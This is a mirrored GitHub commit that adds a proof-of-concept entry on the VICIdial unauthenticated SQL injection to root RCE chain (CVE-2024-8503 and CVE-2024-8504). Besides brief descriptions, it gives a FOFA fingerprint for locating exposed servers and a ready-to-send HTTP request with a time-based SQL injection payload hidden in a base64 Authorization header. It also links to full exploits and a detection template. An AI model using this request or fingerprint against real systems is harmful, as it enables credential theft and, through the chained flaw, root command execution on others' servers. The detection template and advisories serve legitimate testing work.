admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

add VICIdial

Browse Source
This commit is contained in:
Halil 2024-09-17 14:41:19 +03:00 committed by GitHub
parent f438c90ba8
commit 5a0284310f
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 33 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
VICIdial/VICIdial Unauthenticated SQLi to RCE (CVE-2024-8503 and CVE-2024-8504).md Normal file
View File

@ -0,0 +1,33 @@
## VICIdial Unauthenticated SQLi to RCE (CVE-2024-8503 and CVE-2024-8504)
This vulnerability can lead to username and plaintext password exposure. When combined with CVE-2024-8504, it causes a remote code execution vulnerability via sql injection.
The following PoC code tests the vulnerability on a time based.
CVE-2024-8503 (Sqli)
```
An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.
```
CVE-2024-8504 (RCE)
```
An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective.
```
## fofa
```
icon_hash="1375401192"
```
## Poc Example
```
GET /VERM/VERM_AJAX_functions.php?function=log_custom_report HTTP/1.1
Host:
Authorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI=
```
## Exploits
https://en.0day.today/exploit/39746
https://github.com/Chocapikk/CVE-2024-8504
## Nuclei Template
https://github.com/projectdiscovery/nuclei-templates/pull/10757